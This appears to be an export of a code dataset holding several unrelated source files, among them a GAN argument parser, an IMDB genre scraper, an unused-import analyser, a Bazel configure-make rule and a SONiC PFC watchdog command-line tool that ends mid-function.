content stringlengths 5 1.05M |
|---|
from datetime import datetime
import argparse
class ArgParser:
def __init__(self):
self.parser = argparse.ArgumentParser()
self.parser.add_argument('--dataset-dir', dest='dataset_dir', type=str, default='../celeba')
self.parser.add_argument('--condition-file', type=str, default='./list_attr_celeba.txt')
self.parser.add_argument('--checkpoint', type=str, default=None)
self.parser.add_argument('--result-dir', type=str, default='./fake_samples')
self.parser.add_argument('--checkpoint-prefix', type=str, default=datetime.now().strftime("%d-%m-%Y_%H_%M_%S"))
self.parser.add_argument('-ncs', '--no-checkpoints-save', dest='save_checkpoints', action='store_false',
help='do not save checkpoints in regular intervals during training')
self.parser.add_argument('--nrs', '--no-random-sample', dest='random_image_samples', action='store_false',
help='do not save random samples of fake faces during training')
self.parser.add_argument('--ii', '--training-info-interval', dest='training_info_interval', type=int, default=100,
help='controls how often during training info is printed')
self.parser.add_argument('--si', '--sample-interval', dest='sample_interval', type=int, default=16000,
help='controls how often during training sample images are saved ')
self.parser.add_argument('--ci', '--checkpoint-interval', dest='checkpoint_interval', type=int, default=16000,
help='controls how often during training a checkpoint is saved')
self.parser.add_argument('--workers', type=int, default=8)
self.parser.add_argument('--seed', dest='manual_seed', type=int, required=False)
self.parser.add_argument('--fixed-noise-sample', dest='fixed_noise_sample', action='store_true',
help='show model progression by generating samples with the same fixed noise vector during training')
self.parser.set_defaults(save_checkpoints=True, random_image_samples=True,
fixed_noise_sample=False)
def get_config(self):
config, _ = self.parser.parse_known_args()
return config
|
import requests
from bs4 import BeautifulSoup, ResultSet
import pandas as pd
import time
import numpy as np
from typing import Union
class Scraper(object):
def __init__(
self,
id: str = "Turing-College-capstone-project-work",
web_browser: str = "Mozilla/5.0",
url_for_movie_categories: str = "https://www.imdb.com/feature/genre/?ref_=nv_ch_gr",
number_of_movies_per_category: int = 1,
title_of_csv_file: str = "scraped_imdb_file",
timeout: int = 2,
):
"""
Initialization
:param id: Id used to construct scraper headers.
:param web_browser: web browser information used to construct scraper headers.
:param url_for_movie_categories: Url used to collect movie categories for scraping.
:param number_of_movies_per_category: default is set to 1.
:param title_of_csv_file: Default "scraped_imdb_file"
:param timeout: Time duration between the page iteration not to spam IMDB server.
"""
self.header = {id: web_browser}
self.url_for_movie_categories = url_for_movie_categories
self.number_of_movies_per_category = number_of_movies_per_category
self.title_of_csv_file = title_of_csv_file
self.timeout = timeout
self.list = []
def get_page_response(self, url: str, header: dict) -> BeautifulSoup:
"""
Retrieves response from IMDB server.
:param url: desired url.
:param header: identification needed for scraping. constructed during Initialization.
:return: response. if connection blocked prints error message.
"""
self.response = requests.get(url, headers=header)
soup = BeautifulSoup(self.response.text, "html.parser")
if not self.response.ok:
print(f"There is an {self.response} error")
else:
return soup
def collect_movie_categories(self) -> list:
"""
Scrapes IMDB movie categories.
:return: list with all categories from IMDB.
"""
soup = self.get_page_response(
url=self.url_for_movie_categories, header=self.header
)
all_categories = soup.find_all("div", class_="widget_image")
return [movie_genre.find("img")["title"] for movie_genre in all_categories]
def create_page_list(self) -> list:
"""
Creates a list with movie ID required to iterate through the IMDB pages.
:return: list containing required movie IDs
"""
page_list = []
for item in range(1, self.number_of_movies_per_category + 1, 50):
page_list.append(item)
return page_list
def scrape_one_page(
self, category: str, page: int, timeout: float
) -> ResultSet:
"""
Takes the category and movie id from lists, updates the base url with this information and scrapes
the required information.
:param category: category required to construct the URL for scraping
:param page: movie ID required to construct the URL for scraping.
:param timeout: Time duration between the page iteration not to spam IMDB server.
:return:
"""
print(f"Now scraping {category} movies from page starting with movie id {page}")
url = f"https://www.imdb.com/search/title/?genres={category}&sort=boxoffice_gross_us,desc&start={page}&explore=title_type,genres&ref_=adv_nxt"
soup = self.get_page_response(url=url, header=self.header)
all_movies_on_page = soup.find_all("div", class_="lister-item")
time.sleep(timeout)
return all_movies_on_page
@staticmethod
def get_movie_title(movie_info: BeautifulSoup) -> Union[str or None]:
"""
Function which gathers movie title from the provided BeautifulSoup object.
:param movie_info: BeautifulSoup object containing movie info.
:return: appends the title to the selected list. If not provided None is returned.
"""
try:
title = movie_info.find("span", class_="lister-item-index").find_next().text
if title is None:
return np.nan
return str(title)
except ValueError:
return np.nan
@staticmethod
def get_movie_year(
movie_info: BeautifulSoup,
) -> Union[int or None]:
"""
Function which gathers movie release year from the provided BeautifulSoup info.
:param movie_info: BeautifulSoup object containing movie info.
:return: appends the movie release year to selected list. If not provided None is returned.
"""
try:
# Slices the result to take only numeric value
year = movie_info.find("span", class_="lister-item-year").text[1:5]
if year is None:
return np.nan
else:
return int(year)
except ValueError:
return np.nan
@staticmethod
def get_movie_certificate(
movie_info: BeautifulSoup,
) -> Union[str or None]:
"""
Function which gathers movie certificate(age restrictions) from provided BeautifulSoup info.
:param movie_info: BeautifulSoup object containing info about the movie.
:return: appends the movie certificate to selected list. If not provided None is returned.
"""
try:
certificate = movie_info.find("span", class_="certificate").text
if certificate is None:
return np.nan
return str(certificate)
except ValueError:
return np.nan
@staticmethod
def get_movie_runtime(
movie_info: BeautifulSoup,
) -> Union[str or None]:
"""
Function which gathers runtime of the movie from provided BeautifulSoup info.
:param movie_info: BeautifulSoup object containing info about the movie
:return: appends the runtime of the movie to selected list. If not provided None is returned.
"""
try:
runtime = movie_info.find("span", class_="runtime").text
if runtime is None:
return np.nan
return str(runtime)
except ValueError:
return np.nan
@staticmethod
def get_movie_genres(
movie_info: BeautifulSoup,
) -> Union[str or None]:
"""
Function which gathers associated movie genres from provided BeautifulSoup info.
:param movie_info: BeautifulSoup object containing info about the movie.
:return: appends the associated movie genres to the selected list. If not provided None is returned.
"""
try:
# Slices result and removes excessive white spaces
movie_genres = movie_info.find("span", class_="genre").text.rstrip()[1:]
if movie_genres is None:
return np.nan
return str(movie_genres)
except ValueError:
return np.nan
@staticmethod
def get_movie_rating(movie_info: BeautifulSoup) -> Union[float or None]:
"""
Function which gathers movie IMDB rating from provided BeautifulSoup info.
:param movie_info: BeautifulSoup object containing info about the movie.
:return: appends the IMDB rating to the selected list. If not provided None is returned.
"""
try:
rating = movie_info.find("div", class_="inline-block ratings-imdb-rating")[
"data-value"
]
if rating is None:
return np.nan
return float(rating)
except ValueError:
return np.nan
@staticmethod
def get_movie_metascore(movie_info: BeautifulSoup) -> Union[int or None]:
"""
Function which gathers movie Metascore rating from provided BeautifulSoup info.
:param movie_info: BeautifulSoup object containing info about the movie.
:return: appends Metascore rating to the selected list. If not provided None is returned.
"""
try:
# Removes excessive white spaces
metascore = movie_info.find("span", class_="metascore").text.rstrip()
if metascore is None:
return np.nan
return int(metascore)
except ValueError:
return np.nan
@staticmethod
def get_movie_votes(movie_info: BeautifulSoup) -> Union[int or None]:
"""
Function which gathers the number of votes from provided BeautifulSoup info.
:param movie_info: BeautifulSoup object containing info about the movie.
:return: appends the number of votes to the selected list. If not provided None is returned.
"""
try:
total_votes = movie_info.find(
"p", class_="sort-num_votes-visible"
).findChildren("span")[1]["data-value"]
if total_votes is None:
return np.nan
return int(total_votes)
except ValueError:
return np.nan
@staticmethod
def get_movie_box_office(movie_info: BeautifulSoup) -> Union[int or None]:
"""
Function which gathers US box office earnings from provided BeautifulSoup info.
:param movie_info: BeautifulSoup object containing info about the movie.
:return: appends the US box office earnings to the selected list. If not provided None is returned.
"""
try:
box_office = (
movie_info.find("p", class_="sort-num_votes-visible")
.findChildren("span")[4]["data-value"]
.replace(",", "")
)
if box_office is None:
return np.nan
return int(box_office)
except ValueError:
return np.nan
@staticmethod
def get_movie_category(category: str) -> Union[str or None]:
"""
Function which takes the movie category and appends it to the list.
:param category: category of the movie.
:return: appends the category name to the selected list.
"""
try:
if category is None:
return np.nan
return str(category)
except ValueError:
return np.nan
@staticmethod
def write_to_csv(dataframe, title_of_csv_file: str) -> None:
"""
Creates a csv file.
:param dataframe: Pandas dataframe which should be used to create csv
:param title_of_csv_file: desired csv file name
:return: returns csv file
"""
print(" >> Your csv file was created successfully << ")
return dataframe.to_csv(
f"{title_of_csv_file}.csv", index=None, header=True, na_rep=np.nan
)
def collect_information(self) -> pd.DataFrame:
"""
Function which combines all functions required for scraping.
:return: Pandas DataFrame.
"""
main_category_list = self.collect_movie_categories()
page_list = self.create_page_list()
for genre in main_category_list:
for page in page_list:
all_movies_on_page = self.scrape_one_page(
page=page, category=genre, timeout=self.timeout
)
for movie in all_movies_on_page:
self.list.append(
{
"title": self.get_movie_title(movie_info=movie),
"year": self.get_movie_year(movie_info=movie),
"certificate": self.get_movie_certificate(movie_info=movie),
"length": self.get_movie_runtime(movie_info=movie),
"genres": self.get_movie_genres(movie_info=movie),
"rating": self.get_movie_rating(movie_info=movie),
"metascore": self.get_movie_metascore(movie_info=movie),
"total_votes": self.get_movie_votes(movie_info=movie),
"category": self.get_movie_category(category=genre),
"US_box_office": self.get_movie_box_office(
movie_info=movie
),
}
)
return pd.DataFrame(self.list)
def scrape_imdb(
self, number_of_movies_per_category: int, name_of_csv_file: str
) -> None:
"""
Function which is used to activate the scraper.
:param number_of_movies_per_category: desired number of movies per category to be scraped. default = 1
:param name_of_csv_file: desired name of csv file. default = "scraped_imdb_file"
:return: CSV file is created in project directory.
"""
self.number_of_movies_per_category = number_of_movies_per_category
self.title_of_csv_file = name_of_csv_file
self.write_to_csv(self.collect_information(), self.title_of_csv_file)
|
import os
import sys
def _hook(name,value,out):
if name == 'extra_drop_list':
if len(value) <= 0 :
out.write("{}")
return True
temp_array = value.split('|')
out.write("{");
for i in range(len(temp_array)):
out.write(temp_array[i] + ",")
out.write("}")
return True
elif name == 'open_copy_list':
if len(value) <= 0 :
out.write("{}")
return True
temp_array = value.split('|')
out.write("{");
for i in range(len(temp_array)):
out.write(temp_array[i] + ",")
out.write("}")
return True
elif name == 'prev_copy_list':
if len(value) <= 0 :
out.write("{}")
return True
temp_array = value.split('|')
out.write("{");
for i in range(len(temp_array)):
out.write(temp_array[i] + ",")
out.write("}")
return True
elif name == 'monster_group':
if len(value) <= 0 :
out.write("{}")
return True
all_arrays = value.split('|')
out.write("{");
for i in range(len(all_arrays)):
all_objs = all_arrays[i].split(':')
out.write("{monster_id = " + all_objs[0] + ", born_point = " + all_objs[1] + " },")
out.write("}")
return True
return False
return False |
from pwn import *
from pwnlib.util.hashes import *
from pwncli.utils import *
from pwncli.cli import *
|
from dataclasses import dataclass, field
from datetime import datetime
from pathlib import Path
@dataclass
class Detail:
hours: int
kind: str
@dataclass
class Day:
date: datetime
hours: int = 0
details: list[Detail] = field(default_factory=list)
def add_work(self, hours: int, work_kind: str) -> None:
self.hours += hours
self.details.append(Detail(hours, work_kind))
@dataclass
class Sheet:
org_filename: Path
days: dict[datetime, Day] = field(default_factory=dict)
SortedWorkDays = dict[datetime, Day]
|
import ast
import operator
import sys
from dataclasses import dataclass, field
from typing import ClassVar, Iterator, List, Set, Union
if sys.version_info >= (3, 8):
from typing import Literal # unimport: skip
else:
from typing_extensions import Literal
__all__ = ["Import", "ImportFrom", "Name", "Scope"]
@dataclass
class Import:
imports: ClassVar[List[Union["Import", "ImportFrom"]]] = []
lineno: int
column: int
name: str
package: str
node: ast.AST = field(init=False, repr=False, compare=False)
def __len__(self) -> int:
return operator.length_hint(self.name.split("."))
def is_match_sub_packages(self, name_name) -> bool:
return self.name.split(".")[0] == name_name
@property
def scope(self):
return Scope.get_scope_by_current_node(self)
def is_used(self) -> bool:
for name in self.scope.names:
if name is None:
continue
if name.match_import:
if name.match_import == self:
return True
elif name.match(self):
return True
return False
def match_nearest_duplicate_import(self, name: "Name") -> bool:
nearest_import = None
scope = name.scope
while scope:
imports = [
_import
for _import in scope.imports
if name.match_2(_import) and name.lineno > _import.lineno
]
scope = scope.parent
if imports:
nearest_import = max(
filter(
lambda _import: _import.lineno
== max(
imports, key=lambda _import: _import.lineno
).lineno,
imports,
),
key=lambda _import: _import.column,
)
if nearest_import == self:
return True
return False
@property
def is_duplicate(self) -> bool:
return [_import.name for _import in self.imports].count(self.name) > 1
@classmethod
def get_unused_imports(
cls, include_star_import: bool
) -> Iterator[Union["Import", "ImportFrom"]]:
for imp in reversed(Import.imports):
if (
include_star_import
and isinstance(imp, ImportFrom)
and imp.star
):
yield imp
elif not imp.is_used():
yield imp
@classmethod
def register(
cls, lineno: int, column: int, name: str, package: str, node: ast.AST
) -> None:
_import = cls(lineno, column, name, package)
_import.node = node
cls.imports.append(_import)
Scope.register(_import)
@classmethod
def clear(cls):
cls.imports.clear()
@dataclass
class ImportFrom(Import):
star: bool
suggestions: List[str]
def is_match_sub_packages(self, name_name):
return False
@classmethod
def register( # type: ignore
cls,
lineno: int,
column: int,
name: str,
package: str,
node: ast.AST,
star: bool,
suggestions: List[str],
) -> None:
_import = cls(lineno, column, name, package, star, suggestions)
_import.node = node
cls.imports.append(_import)
Scope.register(_import)
@dataclass
class Name:
names: ClassVar[List["Name"]] = []
lineno: int
name: str
node: ast.AST = field(init=False, repr=False, compare=False)
is_all: bool = False
match_import: Union[Import, Literal[False]] = field(
init=False, repr=False, compare=False, default=False
)
@property
def is_attribute(self):
return "." in self.name
def match_2(self, imp: Union[Import, ImportFrom]) -> bool:
if self.is_all:
is_match = self.name == imp.name
elif self.is_attribute:
is_match = imp.lineno < self.lineno and (
".".join(self.name.split(".")[: len(imp)]) == imp.name
or imp.is_match_sub_packages(self.name)
)
else:
is_match = (imp.lineno < self.lineno) and (
self.name == imp.name or imp.is_match_sub_packages(self.name)
)
return is_match
def match(self, imp: Union[Import, ImportFrom]) -> bool:
is_match = self.match_2(imp)
if is_match and imp.is_duplicate:
is_match = imp.match_nearest_duplicate_import(self)
if is_match:
self.match_import = imp
return is_match
@property
def scope(self):
return Scope.get_scope_by_current_node(self)
@classmethod
def register(
cls, lineno: int, name: str, node: ast.AST, is_all: bool = False
) -> None:
_name = cls(lineno, name, is_all)
_name.node = node
cls.names.append(_name)
Scope.register(_name, is_global=is_all)
@classmethod
def clear(cls) -> None:
cls.names.clear()
@dataclass
class Scope:
scopes: ClassVar[List["Scope"]] = []
current_scope: ClassVar[List["Scope"]] = []
node: ast.AST
current_nodes: List[Union[Import, ImportFrom, Name]] = field(
init=False, repr=False, compare=False, default_factory=list
)
parent: "Scope" = field(repr=False, default=None)
child_scopes: Set["Scope"] = field(
init=False, repr=False, compare=False, default_factory=set
)
def __hash__(self) -> int:
return hash(self.node)
@classmethod
def get_curent_scope(cls) -> "Scope":
return cls.current_scope[-1]
@classmethod
def get_global_scope(cls) -> "Scope":
global_scope = cls.scopes[0]
assert global_scope.parent is None
return global_scope
@classmethod
def add_global_scope(cls, tree: ast.AST) -> None:
parent = None
scope = Scope(tree, parent)
cls.current_scope.append(scope)
cls.scopes.append(scope) # global scope added to cls.scopes
@classmethod
def add_current_scope(cls, node: ast.AST) -> None:
parent = cls.get_curent_scope()
scope = Scope(node, parent)
cls.current_scope.append(scope)
@classmethod
def remove_current_scope(cls):
cls.current_scope.pop()
@classmethod
def register(
cls, current_node: Union[Import, ImportFrom, Name], *, is_global=False
) -> None:
scope = cls.get_previous_scope(
cls.get_global_scope() if is_global else cls.get_curent_scope()
)
# current nodes add to scope
scope.current_nodes.append(current_node)
# child scopes add to scope
if scope.parent is None:
return
parent = cls.get_previous_scope(scope.parent)
child_scope = scope
while parent:
parent.child_scopes.add(child_scope)
child_scope = parent
if parent.parent is None:
break
parent = cls.get_previous_scope(parent.parent)
@classmethod
def get_scope_by_current_node(
cls, current_node: Union[Import, ImportFrom, Name]
) -> "Scope":
for scope in cls.scopes:
if current_node in scope.current_nodes:
return scope
return None
@property
def names(self) -> Iterator[Name]:
yield from filter( # type: ignore
lambda node: isinstance(node, Name), self.current_nodes
)
for child_scope in self.child_scopes:
yield from child_scope.names
@property
def imports(self) -> Iterator[Import]:
yield from filter( # type: ignore
lambda node: isinstance(node, Import), self.current_nodes
)
@classmethod
def get_previous_scope(cls, scope: "Scope") -> "Scope":
for _scope in cls.scopes:
if _scope == scope:
return _scope
cls.scopes.append(scope)
return scope
@classmethod
def clear(cls):
cls.scopes.clear()
|
class TaskInstanceConfig(object):
def __init__(self, task_config):
self.cpu = task_config.cpu
self.memory = task_config.memory
self.disk = task_config.disk
self.duration = task_config.duration
class TaskConfig(object):
def __init__(self, task_index, instances_number, cpu, memory, disk, duration, parent_indices=None):
self.task_index = task_index
self.instances_number = instances_number
self.cpu = cpu
self.memory = memory
self.disk = disk
self.duration = duration
self.parent_indices = parent_indices
class JobConfig(object):
def __init__(self, idx, submit_time, task_configs):
self.submit_time = submit_time
self.task_configs = task_configs
self.id = idx
|
# -*- Python -*-
def _cc_configure_make_impl(ctx):
out_includes = ctx.actions.declare_directory(ctx.attr.name + "-includes.h")
out_lib = ctx.actions.declare_file("{}.a".format(ctx.attr.name))
outputs = [out_includes, out_lib]
cpp_fragment = ctx.fragments.cpp
compiler_options = [] # cpp_fragment.compiler_options(ctx.features)
c_options = compiler_options + cpp_fragment.c_options
cxx_options = compiler_options + cpp_fragment.cxx_options(ctx.features)
CFLAGS = "\"{}\"".format(' '.join(c_options))
CXXFLAGS = "\"{}\"".format(' '.join(cxx_options))
# Run ./configure && make from a temporary directory, and install into another temporary directory.
# Finally, copy the results into the directory artifact declared in out_includes.
ctx.actions.run_shell(
mnemonic="ConfigureMake",
inputs=ctx.attr.src.files,
outputs=outputs,
command='\n'.join([
"set -e", "P=$(pwd)", "tmpdir=$(mktemp -d)",
"tmpinstalldir=$(mktemp -d)",
"trap \"{ rm -rf $tmpdir $tmpinstalldir; }\" EXIT",
"pushd $tmpdir",
"CFLAGS={} CXXFLAGS={} $P/{}/configure --prefix=$tmpinstalldir {}".
format(CFLAGS, CXXFLAGS, ctx.attr.src.label.workspace_root,
' '.join(ctx.attr.configure_flags)),
"CFLAGS={} CXXFLAGS={} make install".format(
CFLAGS, CXXFLAGS), "popd", "cp $tmpinstalldir/{} {}".format(
ctx.attr.out_lib_path,
out_lib.path), "cp -R $tmpinstalldir/include/ {}".format(
out_includes.path)
]),
execution_requirements={"block-network": ""})
return [
DefaultInfo(files=depset(direct=outputs)),
OutputGroupInfo(
headers=depset([out_includes]), libfile=depset([out_lib]))
]
_cc_configure_make_rule = rule(
attrs={
"configure_flags": attr.string_list(),
"src": attr.label(mandatory=True),
"out_lib_path": attr.string(mandatory=True),
},
fragments=["cpp"],
output_to_genfiles=True,
implementation=_cc_configure_make_impl,
)
def cc_configure_make(name, configure_flags, src, out_lib_path):
name_cmr = '_{}_cc_configure_make_rule'.format(name)
_cc_configure_make_rule(
name=name_cmr,
configure_flags=configure_flags,
src=src,
out_lib_path=out_lib_path)
name_libfile_fg = '_{}_libfile_fg'.format(name)
native.filegroup(
name=name_libfile_fg,
srcs=[name_cmr],
output_group="libfile",
)
name_libfile_import = '_{}_libfile_import'.format(name)
native.cc_import(
name=name_libfile_import,
static_library=name_libfile_fg,
)
name_headers_fg = '_{}_headers_fg'.format(name)
native.filegroup(
name=name_headers_fg,
srcs=[name_cmr],
output_group="headers",
)
native.cc_library(
name=name,
hdrs=[name_headers_fg],
includes=[name_cmr + "-includes.h"],
deps=[name_libfile_import],
)
|
import os
import imp
import sys
import click
import utilities_common.cli as clicommon
from natsort import natsorted
from sonic_py_common.multi_asic import get_external_ports
from tabulate import tabulate
from utilities_common import multi_asic as multi_asic_util
from utilities_common import constants
# mock the redis for unit test purposes #
try:
if os.environ["UTILITIES_UNIT_TESTING"] == "2":
modules_path = os.path.join(os.path.dirname(__file__), "..")
tests_path = os.path.join(modules_path, "tests")
sys.path.insert(0, modules_path)
sys.path.insert(0, tests_path)
import mock_tables.dbconnector
if os.environ["UTILITIES_UNIT_TESTING_TOPOLOGY"] == "multi_asic":
import mock_tables.mock_multi_asic
imp.reload(mock_tables.mock_multi_asic)
mock_tables.dbconnector.load_namespace_config()
except KeyError:
pass
# Default configuration
DEFAULT_DETECTION_TIME = 200
DEFAULT_RESTORATION_TIME = 200
DEFAULT_POLL_INTERVAL = 200
DEFAULT_PORT_NUM = 32
DEFAULT_ACTION = 'drop'
STATS_DESCRIPTION = [
('STORM DETECTED/RESTORED', 'PFC_WD_QUEUE_STATS_DEADLOCK_DETECTED', 'PFC_WD_QUEUE_STATS_DEADLOCK_RESTORED'),
('TX OK/DROP', 'PFC_WD_QUEUE_STATS_TX_PACKETS', 'PFC_WD_QUEUE_STATS_TX_DROPPED_PACKETS'),
('RX OK/DROP', 'PFC_WD_QUEUE_STATS_RX_PACKETS', 'PFC_WD_QUEUE_STATS_RX_DROPPED_PACKETS'),
('TX LAST OK/DROP', 'PFC_WD_QUEUE_STATS_TX_PACKETS_LAST', 'PFC_WD_QUEUE_STATS_TX_DROPPED_PACKETS_LAST'),
('RX LAST OK/DROP', 'PFC_WD_QUEUE_STATS_RX_PACKETS_LAST', 'PFC_WD_QUEUE_STATS_RX_DROPPED_PACKETS_LAST'),
]
CONFIG_DESCRIPTION = [
('ACTION', 'action', 'drop'),
('DETECTION TIME', 'detection_time', 'N/A'),
('RESTORATION TIME', 'restoration_time', 'infinite')
]
STATS_HEADER = ('QUEUE', 'STATUS',) + list(zip(*STATS_DESCRIPTION))[0]
CONFIG_HEADER = ('PORT',) + list(zip(*CONFIG_DESCRIPTION))[0]
CONFIG_DB_PFC_WD_TABLE_NAME = 'PFC_WD'
# Main entrypoint
@click.group()
def cli():
""" SONiC PFC Watchdog """
def get_all_queues(db, namespace=None, display=constants.DISPLAY_ALL):
queue_names = db.get_all(db.COUNTERS_DB, 'COUNTERS_QUEUE_NAME_MAP')
queues = list(queue_names.keys()) if queue_names else {}
if display == constants.DISPLAY_ALL:
return natsorted(queues)
# filter the backend ports
display_ports = [q.split(":")[0] for q in queues]
display_ports = get_external_ports(display_ports, namespace)
queues = [q for q in queues if q.split(":")[0] in display_ports]
return natsorted(queues)
def get_all_ports(db, namespace=None, display=constants.DISPLAY_ALL):
all_port_names = db.get_all(db.COUNTERS_DB, 'COUNTERS_PORT_NAME_MAP')
# Get list of physical ports
port_names = {}
for i in all_port_names:
if i.startswith('Ethernet'):
port_names[i] = all_port_names[i]
display_ports = list(port_names.keys())
if display == constants.DISPLAY_EXTERNAL:
display_ports = get_external_ports(display_ports, namespace)
return natsorted(display_ports)
def get_server_facing_ports(db):
candidates = db.get_table('DEVICE_NEIGHBOR')
server_facing_ports = []
for port in candidates:
neighbor = db.get_entry(
'DEVICE_NEIGHBOR_METADATA', candidates[port]['name']
)
if neighbor and neighbor['type'].lower() == 'server':
server_facing_ports.append(port)
if not server_facing_ports:
server_facing_ports = [p[1] for p in db.get_table('VLAN_MEMBER')]
return server_facing_ports
class PfcwdCli(object):
def __init__(
self, db=None, namespace=None, display=constants.DISPLAY_ALL
):
self.db = None
self.config_db = None
self.multi_asic = multi_asic_util.MultiAsic(
display, namespace, db
)
self.table = []
self.all_ports = []
@multi_asic_util.run_on_multi_asic
def collect_stats(self, empty, queues):
table = []
if len(queues) == 0:
queues = get_all_queues(
self.db,
self.multi_asic.current_namespace,
self.multi_asic.display_option
)
for queue in queues:
stats_list = []
queue_oid = self.db.get(
self.db.COUNTERS_DB, 'COUNTERS_QUEUE_NAME_MAP', queue
)
if queue_oid is None:
continue
stats = self.db.get_all(
self.db.COUNTERS_DB, 'COUNTERS:' + queue_oid
)
if stats is None:
continue
for stat in STATS_DESCRIPTION:
line = stats.get(stat[1], '0') + '/' + stats.get(stat[2], '0')
stats_list.append(line)
if stats_list != ['0/0'] * len(STATS_DESCRIPTION) or empty:
table.append(
[queue, stats.get('PFC_WD_STATUS', 'N/A')] + stats_list
)
self.table += table
def show_stats(self, empty, queues):
del self.table[:]
self.collect_stats(empty, queues)
click.echo(tabulate(
self.table, STATS_HEADER, stralign='right', numalign='right',
tablefmt='simple'
))
@multi_asic_util.run_on_multi_asic
def get_all_namespace_ports(self):
ports = get_all_ports(
self.db, self.multi_asic.current_namespace,
self.multi_asic.display_option
)
self.all_ports.extend(ports)
def get_invalid_ports(self, ports=[]):
if len(ports) == 0:
return []
self.get_all_namespace_ports()
port_set = set(ports)
# "all" is a valid option, remove before performing set diff
port_set.discard("all")
return port_set - set(self.all_ports)
@multi_asic_util.run_on_multi_asic
def collect_config(self, ports):
table = []
if len(ports) == 0:
ports = get_all_ports(
self.db, self.multi_asic.current_namespace,
self.multi_asic.display_option
)
ports_found = False
for port in ports:
config_list = []
config_entry = self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, port
)
if config_entry is None or config_entry == {}:
continue
ports_found = True
for config in CONFIG_DESCRIPTION:
line = config_entry.get(config[1], config[2])
config_list.append(line)
table.append([port] + config_list)
if not ports_found:
return
poll_interval = self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, 'GLOBAL'
).get('POLL_INTERVAL')
current_ns = self.multi_asic.current_namespace
asic_namesapce = \
"" if current_ns is None or current_ns == "" else " on {}".format(
current_ns
)
if poll_interval is not None:
click.echo(
"Changed polling interval to {}ms{}".format(
poll_interval, asic_namesapce
)
)
big_red_switch = self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, 'GLOBAL'
).get('BIG_RED_SWITCH')
if big_red_switch is not None:
click.echo("BIG_RED_SWITCH status is {}{}".format(
big_red_switch, asic_namesapce
))
self.table += table
def config(self, ports):
del self.table[:]
self.collect_config(ports)
click.echo(tabulate(
self.table, CONFIG_HEADER, stralign='right', numalign='right',
tablefmt='simple'
))
def start(self, action, restoration_time, ports, detection_time):
invalid_ports = self.get_invalid_ports(ports)
if len(invalid_ports):
click.echo("Failed to run command, invalid options:")
for opt in invalid_ports:
click.echo(opt)
exit()
self.start_cmd(action, restoration_time, ports, detection_time)
@multi_asic_util.run_on_multi_asic
def start_cmd(self, action, restoration_time, ports, detection_time):
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
all_ports = get_all_ports(
self.db, self.multi_asic.current_namespace,
self.multi_asic.display_option
)
if len(ports) == 0:
ports = all_ports
pfcwd_info = {
'detection_time': detection_time,
}
if action is not None:
pfcwd_info['action'] = action
if restoration_time is not None:
pfcwd_info['restoration_time'] = restoration_time
else:
pfcwd_info['restoration_time'] = 2 * detection_time
click.echo(
"restoration time not defined; default to 2 times "
"detection time: {} ms".format(2 * detection_time)
)
for port in ports:
if port == "all":
for p in all_ports:
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, p, None
)
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, p, pfcwd_info
)
else:
if port not in all_ports:
continue
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, port, None
)
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, port, pfcwd_info
)
@multi_asic_util.run_on_multi_asic
def interval(self, poll_interval):
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
pfcwd_info = {}
if poll_interval is not None:
pfcwd_table = self.config_db.get_table(CONFIG_DB_PFC_WD_TABLE_NAME)
entry_min = 3000
for entry in pfcwd_table:
if("Ethernet" not in entry):
continue
detection_time_entry_value = int(self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, entry
).get('detection_time'))
restoration_time_entry_value = int(self.config_db.get_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, entry
).get('restoration_time'))
if ((detection_time_entry_value is not None) and
(detection_time_entry_value < entry_min)
):
entry_min = detection_time_entry_value
entry_min_str = "detection time"
if ((restoration_time_entry_value is not None) and
(restoration_time_entry_value < entry_min)
):
entry_min = restoration_time_entry_value
entry_min_str = "restoration time"
if entry_min < poll_interval:
click.echo(
"unable to use polling interval = {}ms, value is "
"bigger than one of the configured {} values, "
"please choose a smaller polling_interval".format(
poll_interval, entry_min_str
), err=True
)
exit(1)
pfcwd_info['POLL_INTERVAL'] = poll_interval
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, "GLOBAL", pfcwd_info
)
@multi_asic_util.run_on_multi_asic
def stop(self, ports):
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
all_ports = get_all_ports(
self.db, self.multi_asic.current_namespace,
self.multi_asic.display_option
)
if len(ports) == 0:
ports = all_ports
for port in ports:
if port not in all_ports:
continue
self.config_db.mod_entry(CONFIG_DB_PFC_WD_TABLE_NAME, port, None)
@multi_asic_util.run_on_multi_asic
def start_default(self):
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
enable = self.config_db.get_entry('DEVICE_METADATA', 'localhost').get(
'default_pfcwd_status'
)
# Get active ports from Config DB
active_ports = natsorted(
list(self.config_db.get_table('DEVICE_NEIGHBOR').keys())
)
if not enable or enable.lower() != "enable":
return
port_num = len(list(self.config_db.get_table('PORT').keys()))
# Paramter values positively correlate to the number of ports.
multiply = max(1, (port_num-1)//DEFAULT_PORT_NUM+1)
pfcwd_info = {
'detection_time': DEFAULT_DETECTION_TIME * multiply,
'restoration_time': DEFAULT_RESTORATION_TIME * multiply,
'action': DEFAULT_ACTION
}
for port in active_ports:
self.config_db.set_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, port, pfcwd_info
)
pfcwd_info = {}
pfcwd_info['POLL_INTERVAL'] = DEFAULT_POLL_INTERVAL * multiply
self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, "GLOBAL", pfcwd_info
)
@multi_asic_util.run_on_multi_asic
def counter_poll(self, counter_poll):
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
pfcwd_info = {}
pfcwd_info['FLEX_COUNTER_STATUS'] = counter_poll
self.config_db.mod_entry("FLEX_COUNTER_TABLE", "PFCWD", pfcwd_info)
@multi_asic_util.run_on_multi_asic
def big_red_switch(self, big_red_switch):
if os.geteuid() != 0:
exit("Root privileges are required for this operation")
pfcwd_info = {}
if big_red_switch is not None:
pfcwd_info['BIG_RED_SWITCH'] = big_red_switch
